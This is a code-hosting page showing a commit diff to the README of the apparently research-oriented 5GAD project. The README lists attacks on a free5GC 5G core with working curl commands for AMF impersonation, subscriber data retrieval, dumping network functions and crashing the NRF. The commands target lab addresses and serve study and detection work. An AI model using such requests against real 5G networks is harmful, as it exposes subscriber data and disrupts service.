crash.software
Projects
Pull Requests
Issues
Builds
5GAD
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY 5GAD Commits 2e3bc3a5
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 57 lines
    58 58  ### AMFLookingForUDM
    59 59  This attack is performed by requesting information about the unified data management (UDM) network function while impersonating an access and mobility management function (AMF). Internally this attack appears to be a benign system request and exploits the fact that the network repository function (NRF) does not check if the source of the request is actually an AMF. This attack is performed with the following Linux command:
    60 60  ```
    61  -curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=AMF\&target-nf-type=UDM"
     61 +curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=AMF&target-nf-type=UDM"
    62 62  ```
    63 63  where 127.0.0.10 is the IP address of the NRF.
    64 64   
    skipped 3 lines
    68 68  ### GetUserData
    69 69  This attack requests information from the UDM regarding a user with `subscriberID=0000000003`. This attack was performed with:
    70 70  ```
    71  -curl "http://127.0.0.3:8000/nudm-dm/v1/imsi-20893\$\{subscriberID\}/am-data?plmn-id=\%7B\%22mcc\%22\%3A\%22208\%22\%2C\%22mnc\%22\%3A\%2293\%22\%7D"
     71 +curl "http://127.0.0.3:8000/nudm-dm/v1/imsi-20893${subscriberID}/am-data?plmn-id=%7B\%22mcc\%22\%3A\%22208\%22\%2C\%22mnc\%22\%3A\%2293\%22\%7D"
    72 72  ```
    73 73   
    74 74  ### randomDataDump
    75 75  This attack exploits a lack of input validation in free5GC and sets the `requester-nf-type` to a random string when making an `nf-instances` request to the NRF. The NRF will still respond with all of the NFs. This attack is executed with the following Linux command:
    76 76  ```
    77  -curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=\$randomString\&target-nf-type="
     77 +curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=$randomString&target-nf-type="
    78 78  ```
    79 79   
    80 80  ### automatedRedirectWithTimer
    skipped 189 lines
    270 270  ### CrashNRF
    271 271  This attack relies on an exploit in free5GC wherein a malformed request to the network repository function (NRF) will cause it to crash. This attack is run using
    272 272  ```
    273  -curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=\&target-nf-type="
     273 +curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=&target-nf-type="
    274 274  ```
    275 275  where 127.0.0.10 is the IP address of the NRF. As of free5GC v3.1.1, this exploit appears to have been patched, as this HTTP `GET` request will no longer result in the failure of the core.
    276 276  
    skipped 46 lines
Please wait...
Page is in error, reload to recover